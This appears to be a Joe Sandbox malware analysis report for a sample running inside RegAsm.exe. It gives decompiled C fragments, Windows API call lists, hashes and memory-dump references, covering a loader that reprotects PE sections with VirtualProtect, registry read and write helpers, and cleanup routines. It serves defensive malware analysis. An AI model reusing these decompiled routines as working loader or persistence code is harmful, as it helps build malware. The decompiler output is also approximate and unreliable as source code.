Opcode ID: d7f05e228813ed220e8b79aa78e5152bff4e99041a78759137eaaac3f7f0e4f6
Instruction ID: 06e2f3270a1013809656fddeeb20dc4239b4ae3dbe746baf91be277ce84b89f2
Opcode Fuzzy Hash: d7f05e228813ed220e8b79aa78e5152bff4e99041a78759137eaaac3f7f0e4f6
Instruction Fuzzy Hash: 67317175D0421DEFCB32EFA8EC509AEBBB8FB05750F04416AE914A22A4D7705E40DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 010A3C44, Relevance: 4.6, APIs: 3, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E010A3C44(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x10aa290, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E010A792E(_t57 - _a4, _a4, _t48);
							_t38 = E010A792E(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E010A792E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}

0x010a3c4c
0x010a3c51
0x010a3c53
0x010a3c5a
0x010a3c6c
0x010a3c6c
0x010a3c70
0x010a3c72
0x010a3c75
0x010a3c78
0x010a3c81
0x010a3c8b
0x010a3c8f
0x010a3c94
0x010a3ca4
0x010a3caa
0x010a3cae
0x010a3cfd
0x010a3cb0
0x010a3cb0
0x010a3cb9
0x010a3cc8
0x010a3ccd
0x010a3cda
0x010a3ce3
0x010a3cee
0x010a3cf5
0x010a3cf9
0x010a3cf9
0x010a3cae
0x010a3d04
0x010a3d0b

APIs

lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 010A3C78
StrStrA.SHLWAPI(00000000,?), ref: 010A3C85
RtlAllocateHeap.NTDLL(00000000,?), ref: 010A3CA4

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: AllocateHeaplstrlen
String ID:
API String ID: 556738718-0
Opcode ID: a0fd4762a44b2c484e6de5f83e7b9e7c1b0b6c0ad549c60a554be131dddff210
Instruction ID: 09cd60ce567db3ce784c02c5ff1e6c17190a153e4e6506b471c1cb8ff8e748e3
Opcode Fuzzy Hash: a0fd4762a44b2c484e6de5f83e7b9e7c1b0b6c0ad549c60a554be131dddff210
Instruction Fuzzy Hash: 30218E39600209AFCB11DFACD888BDEBFB9EF85210F448155ED84AB309C735E915CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F15C28, Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F16DB5: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,?,00000000,?,69B25F44,?,00000000,00000000), ref: 03F16DEB
Part of subcall function 03F16DB5: lstrcpy.KERNEL32(00000000,00000000), ref: 03F16E0F
Part of subcall function 03F16DB5: lstrcat.KERNEL32(00000000,00000000), ref: 03F16E17

RegOpenKeyExA.KERNELBASE(03F0D25C,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,03F0D25C,80000001,?,03F14958), ref: 03F15C6F
RegOpenKeyExA.ADVAPI32(03F0D25C,03F0D25C,00000000,00020019,80000001,?,03F0D25C,80000001,?,03F14958), ref: 03F15C85
RegCloseKey.ADVAPI32(80000001,80000001,?,03F14958,03F14968,?,03F0D25C,80000001,?,03F14958), ref: 03F15CCE

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Open$Closelstrcatlstrcpylstrlen
String ID:
API String ID: 4131162436-0
Opcode ID: fd567c304e0b6dd6e43831577d0e330f0ac3dcd4f6f241509a137897be0b10b9
Instruction ID: da2036ca9dd391dbdc401b02b8d922dd09f1810e67f84dd95168b731e5d52612
Opcode Fuzzy Hash: fd567c304e0b6dd6e43831577d0e330f0ac3dcd4f6f241509a137897be0b10b9
Instruction Fuzzy Hash: 8E214D75A0020DFFDB10EFA5DC81C9EBBBCEB49304B14406AEA04E7251E770AE59DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00401204, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00401204(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x404180;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x0040120e
0x0040121b
0x00401221
0x0040122d
0x0040123d
0x0040123f
0x00401247
0x004012dc
0x004012e3
0x00000000
0x00000000
0x00000000
0x0040124d
0x0040124d
0x0040124d
0x00401251
0x00000000
0x00000000
0x0040125d
0x00401261
0x00401285
0x00401289
0x0040129d
0x0040129d
0x004012a3
0x004012b2
0x004012b6
0x004012be
0x004012be
0x004012c6
0x004012c9
0x004012d6
0x00000000
0x00000000
0x00000000
0x00000000
0x004012d6
0x00401291
0x00401295
0x0040129b
0x00000000
0x00000000
0x00000000
0x0040129b
0x00401269
0x0040126d
0x00401277
0x0040126f
0x0040126f
0x0040126f
0x00000000
0x0040126d
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,00000002,00000000,?,00000002), ref: 0040123D
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 004012B2
GetLastError.KERNEL32 ref: 004012B8

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 2337e87e33ccd1c179b3d8dcb66b86ac704bced9e75e1188a12c0029e71a8f03
Instruction ID: 1d0531a5d6c7ebc342613407374b3ecce097b71dfafa648457fccedcf1de301b
Opcode Fuzzy Hash: 2337e87e33ccd1c179b3d8dcb66b86ac704bced9e75e1188a12c0029e71a8f03
Instruction Fuzzy Hash: 47215E71800209DFCB14CF85C985ABAF7F4FB18345F4144AED202E7159E3B8AA65CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401143, Relevance: 4.6, APIs: 3, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00401143() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t24;
				int _t25;
				void* _t29;
				intOrPtr* _t31;
				signed int _t35;
				intOrPtr _t37;

				 *0x404190 =  *0x404190 & 0x00000000;
				_push(0);
				_push(0x40418c);
				_push(1);
				_push( *0x404184 + 0x405089);
				 *0x404188 = 0xc; // executed
				L00401F90(); // executed
				_t35 = 6;
				memset( &_v44, 0, _t35 << 2);
				if(E0040193B( &_v44,  &_v28,  *0x404180 ^ 0xf7a71548) == 0) {
					_t24 = 0xb;
					L7:
					ExitThread(_t24);
				}
				_t25 = lstrlenW( *0x404178);
				_t7 = _t25 + 2; // 0x2
				_t10 = _t25 + _t7 + 8; // 0xa
				_t29 = E00401C44(_t37, _t10,  &_v48,  &_v52); // executed
				if(_t29 == 0) {
					_t38 =  *0x404178;
					_t31 = _v52;
					 *_t31 = 0;
					if( *0x404178 == 0) {
						 *(_t31 + 4) =  *(_t31 + 4) & 0x00000000;
					} else {
						E00402081(_t42, _t38, _t31 + 4);
					}
				}
				_t24 = E004016FC(_v44); // executed
				goto L7;
			}

0x0040114e
0x00401159
0x0040115b
0x00401160
0x00401168
0x00401169
0x00401173
0x0040117c
0x00401181
0x0040119f
0x004011fb
0x004011fc
0x004011fd
0x004011fd
0x004011a7
0x004011ad
0x004011bb
0x004011bf
0x004011c6
0x004011c8
0x004011d0
0x004011d4
0x004011da
0x004011e9
0x004011dc
0x004011e2
0x004011e2
0x004011da
0x004011f2
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,0040418C,00000000), ref: 00401173
lstrlenW.KERNEL32(?,?,?), ref: 004011A7

Part of subcall function 00401C44: GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,004011C4,0000000A,?), ref: 00401C51
Part of subcall function 00401C44: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401C67
Part of subcall function 00401C44: _snwprintf.NTDLL ref: 00401C8C
Part of subcall function 00401C44: CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 00401CB1
Part of subcall function 00401C44: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011C4,0000000A), ref: 00401CC8
Part of subcall function 00401C44: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011C4), ref: 00401CFD

ExitThread.KERNEL32 ref: 004011FD

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: 5c15f1ccb8094eecad3e336872d053bc8340d761f337f15a04e594afd21d5dae
Instruction ID: 5b5ecc649872516131d524b875f68bc5dfe818dbd7973f42e6467aeca8a944dc
Opcode Fuzzy Hash: 5c15f1ccb8094eecad3e336872d053bc8340d761f337f15a04e594afd21d5dae
Instruction Fuzzy Hash: 911193B2104305ABE300EB55DD49F5777ECAB88304F01453ABA04FB1F1DB74E5459759

Uniqueness

Uniqueness Score: -1.00%

Function 03F13B22, Relevance: 4.6, APIs: 3, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F08E53: RegCreateKeyA.ADVAPI32(80000001,043AA7F0,?), ref: 03F08E68
Part of subcall function 03F08E53: lstrlen.KERNEL32(043AA7F0,00000000,00000000,00000000,?,03F0B86A,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32,?,03F1BD19), ref: 03F08E91

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000000,00000001,?,00000001,00000000), ref: 03F13B63
RegSetValueExA.KERNELBASE(?,?,00000000,00000003,?,00000010), ref: 03F13B95
RegCloseKey.ADVAPI32(?), ref: 03F13BB7

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Value$CloseCreateQuerylstrlen
String ID:
API String ID: 2552977122-0
Opcode ID: e87afc902b28568d07f888544b40be1da38ac2b15779353f7d79f860b86c5825
Instruction ID: 06069d3c125f6f49e6a70d66abdcf5d2faa2603b9406d447162745ae30cc5548
Opcode Fuzzy Hash: e87afc902b28568d07f888544b40be1da38ac2b15779353f7d79f860b86c5825
Instruction Fuzzy Hash: E1113A7990021DEFDF20EFA5DC59BEEBBB8FB44710F1000A6E900A7294E774AA44DB51

Uniqueness

Uniqueness Score: -1.00%

Function 03F08728, Relevance: 4.6, APIs: 3, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F23345: lstrlenW.KERNEL32(?,?,00000000,74E04D40,?,?,03F0874D,?,74E04D40), ref: 03F23351
Part of subcall function 03F23345: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,03F0874D,?,74E04D40), ref: 03F23379
Part of subcall function 03F23345: memset.NTDLL ref: 03F2338B

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?,?,?,?,74E04D40), ref: 03F0877E
RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000004), ref: 03F0879A
RegCloseKey.ADVAPI32(?), ref: 03F087AB

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 01520449f25b87e138be3ed7479ecbabd2447b19350f4573e2048a9c27abbd7d
Instruction ID: ded5cf3e3ef102fa009ad56671a68ea1ff9dffbcb48453b4bf29b06a9ec150f5
Opcode Fuzzy Hash: 01520449f25b87e138be3ed7479ecbabd2447b19350f4573e2048a9c27abbd7d
Instruction Fuzzy Hash: 65115E76A0020DFFDB10EBE8CC95FAEB7BCAB54744F144065E600E7185EB74DA059B20

Uniqueness

Uniqueness Score: -1.00%

Function 010A23E8, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A23E8(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x10aa2d4; // 0x235d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x10aba40; // 0x4f0053
				_v16 = 4;
				_t31 = E010A1C56(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x10aa2d4; // 0x235d5a8
					_t5 = _t19 + 0x10aba9c; // 0x6e0049
					_t34 = E010A1C56(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E010A2625(_t34);
					}
					E010A2625(_t31);
				}
				return _v8;
			}

0x010a23ee
0x010a23f3
0x010a23f8
0x010a23ff
0x010a240b
0x010a240f
0x010a2411
0x010a2417
0x010a2423
0x010a2427
0x010a243a
0x010a2442
0x010a2456
0x010a245e
0x010a2460
0x010a2460
0x010a2467
0x010a2467
0x010a246e
0x010a246e
0x010a2474
0x010a2479
0x010a247f

APIs

Part of subcall function 010A1C56: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,010A240B,004F0053,00000000,?), ref: 010A1C5F
Part of subcall function 010A1C56: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,010A240B,004F0053,00000000,?), ref: 010A1C89
Part of subcall function 010A1C56: memset.NTDLL ref: 010A1C9D

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 010A243A
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 010A2456
RegCloseKey.ADVAPI32(00000000), ref: 010A2467

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 0e0e12b2fe46fdfb5d73186d2f2087aa49aad59040effffe8a6b099c9b581509
Instruction ID: f4cad2d4158a2c9323e2f4da49806ef2872df8c9129992332c5a88be2a4f06d3
Opcode Fuzzy Hash: 0e0e12b2fe46fdfb5d73186d2f2087aa49aad59040effffe8a6b099c9b581509
Instruction Fuzzy Hash: 16113C72600209EBDB21DBD8DD48FEE77FCAB04300F9000A5F681E7041EB7996049B24

Uniqueness

Uniqueness Score: -1.00%

Function 03F08E53, Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,043AA7F0,?), ref: 03F08E68
RegOpenKeyA.ADVAPI32(80000001,043AA7F0,?), ref: 03F08E72
lstrlen.KERNEL32(043AA7F0,00000000,00000000,00000000,?,03F0B86A,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32,?,03F1BD19), ref: 03F08E91

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: 2c3c71704d423bacb390865906f94d54ff9c00c6d7198398201806e6c611dca8
Instruction ID: 8736928271d2547da0d689a5deb72b1501e72e1b18785fd5fc05d72bbf2a1bc2
Opcode Fuzzy Hash: 2c3c71704d423bacb390865906f94d54ff9c00c6d7198398201806e6c611dca8
Instruction Fuzzy Hash: 02F06D7610020DFFE721EF94DC99FAA7B6CEB45790F108059FD4285284D7B49A40CB61

Uniqueness

Uniqueness Score: -1.00%

Function 03F1AC11, Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(000003C4,03F22729), ref: 03F1AC1B

Part of subcall function 03F08483: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,03F1AC26), ref: 03F084AC
Part of subcall function 03F08483: RtlDeleteCriticalSection.NTDLL(03F2C2E0), ref: 03F084DF
Part of subcall function 03F08483: RtlDeleteCriticalSection.NTDLL(03F2C300), ref: 03F084E6
Part of subcall function 03F08483: CloseHandle.KERNEL32(?,?,03F1AC26), ref: 03F08515
Part of subcall function 03F08483: ReleaseMutex.KERNEL32(00000520,00000000,?,?,?,03F1AC26), ref: 03F08526
Part of subcall function 03F08483: CloseHandle.KERNEL32(?,?,03F1AC26), ref: 03F08532
Part of subcall function 03F08483: ResetEvent.KERNEL32(00000000,00000000,?,?,?,03F1AC26), ref: 03F0853E
Part of subcall function 03F08483: CloseHandle.KERNEL32(?,?,03F1AC26), ref: 03F0854A
Part of subcall function 03F08483: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,03F1AC26), ref: 03F08550
Part of subcall function 03F08483: SleepEx.KERNEL32(00000064,00000001,?,?,03F1AC26), ref: 03F08564
Part of subcall function 03F08483: HeapFree.KERNEL32(00000000,00000000,?,?,03F1AC26), ref: 03F08587
Part of subcall function 03F08483: RtlRemoveVectoredExceptionHandler.NTDLL(00E7EAD8), ref: 03F085C0

CloseHandle.KERNEL32(000003C4), ref: 03F1AC30
HeapDestroy.KERNELBASE(03FB0000), ref: 03F1AC40

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CloseHandle$Sleep$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
String ID:
API String ID: 1636361345-0
Opcode ID: 538fba0f8f9d97851fb7834ae203c7db472386b5ac0cbeec9f6421c24afcbe19
Instruction ID: 890809d25667e828123ef9a3c0fab29790a09b6d74593ca899e3ea279d5a655d
Opcode Fuzzy Hash: 538fba0f8f9d97851fb7834ae203c7db472386b5ac0cbeec9f6421c24afcbe19
Instruction Fuzzy Hash: 37E017B0F0130ACBDF30FF7AF8ACE1A33ACBB206823084420B401D3198DB64D801AA65

Uniqueness

Uniqueness Score: -1.00%

Function 010A4F41, Relevance: 3.8, APIs: 3, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A4F41(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E010A4573(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x10aa324, 0x110);
					_t27 =  *0x10aa328; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E010A155C(0x110, _a4, _t27, 0);
					}
					if(E010A28F6( &_v36) != 0) {
						_t35 = E010A7479(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E010A3D15(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875fc
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E010A2625(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E010A2625(_a4);
				}
				return _v16;
			}

0x010a4f47
0x010a4f4c
0x010a4f59
0x010a4f5c
0x010a4f5f
0x010a4f66
0x010a4f69
0x010a4f77
0x010a4f7c
0x010a4f81
0x010a4f86
0x010a4f88
0x010a4f90
0x010a4f90
0x010a4f9f
0x010a4fb4
0x010a4fbb
0x010a4fc2
0x010a4fc8
0x010a4fce
0x010a4fd6
0x010a4fdc
0x010a4fdf
0x010a4fec
0x010a4ff1
0x010a4ff5
0x010a4ff5
0x010a4fbb
0x010a5000
0x010a500b
0x010a500b
0x010a5017

APIs

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

memcpy.NTDLL(00000000,00000110,010A673C,010A673C,?,?,010A673C,?,?,010A3BD3,?), ref: 010A4F77
memset.NTDLL ref: 010A4FEC
memset.NTDLL ref: 010A5000

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 81db86ed905e6fb55bdfd81e6de63b35018b7df35af6e1ebc3cd71f451763311
Instruction ID: cc2229d7929e66dbc6a08133de8e468a8907912d1a0a748e7c9eba97e85252a8
Opcode Fuzzy Hash: 81db86ed905e6fb55bdfd81e6de63b35018b7df35af6e1ebc3cd71f451763311
Instruction Fuzzy Hash: E1215176A00219ABDF11AFA9CC40FEE7BB8AF18250F448065F984E7241D774D615CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 010A2ACB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E010A2ACB(void* __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E010A5B45(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x10aa2d4; // 0x235d5a8
						_t9 = _t17 + 0x10ab9e8; // 0x444f4340
						_t20 = E010A3C44( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x10aa290, 0, _a4); // executed
					}
				}
				return _t26;
			}

0x010a2ace
0x010a2ad4
0x010a2b2b
0x010a2ada
0x010a2ae5
0x010a2aea
0x010a2aee
0x010a2afb
0x010a2b03
0x010a2b0f
0x010a2b17
0x010a2b21
0x010a2b21
0x010a2aee
0x010a2b30

APIs

Part of subcall function 010A5B45: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 010A5B5D

Part of subcall function 010A3C44: lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 010A3C78
Part of subcall function 010A3C44: StrStrA.SHLWAPI(00000000,?), ref: 010A3C85
Part of subcall function 010A3C44: RtlAllocateHeap.NTDLL(00000000,?), ref: 010A3CA4

RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,010A1296), ref: 010A2B21

Strings

Ut, xrefs: 010A2B21

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Heap$Allocate$Freelstrlen
String ID: Ut
API String ID: 2220322926-8415677
Opcode ID: 94e536cdfe959885cc6a1080d0d42776166b9b9fc20fc9bc35d2e83711ea7578
Instruction ID: dfa1c8fd5074f1da43f209668beb6b9250de1f49d53e73c31b5049a6c81b80f3
Opcode Fuzzy Hash: 94e536cdfe959885cc6a1080d0d42776166b9b9fc20fc9bc35d2e83711ea7578
Instruction Fuzzy Hash: 43018176210609FFDB22CF98CC40EEABBF9EB54740F504025FA8986160EB72EA54DB50

Uniqueness

Uniqueness Score: -1.00%

Function 010A2625, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A2625(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x10aa290, 0, _a4); // executed
				return _t2;
			}

0x010a2631
0x010a2637

APIs

RtlFreeHeap.NTDLL(00000000,00000000,010A5AE0,00000000,00000000,00000000,00000000,?,?,?,?,?,010A11F4,00000000), ref: 010A2631

Strings

Ut, xrefs: 010A2631

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
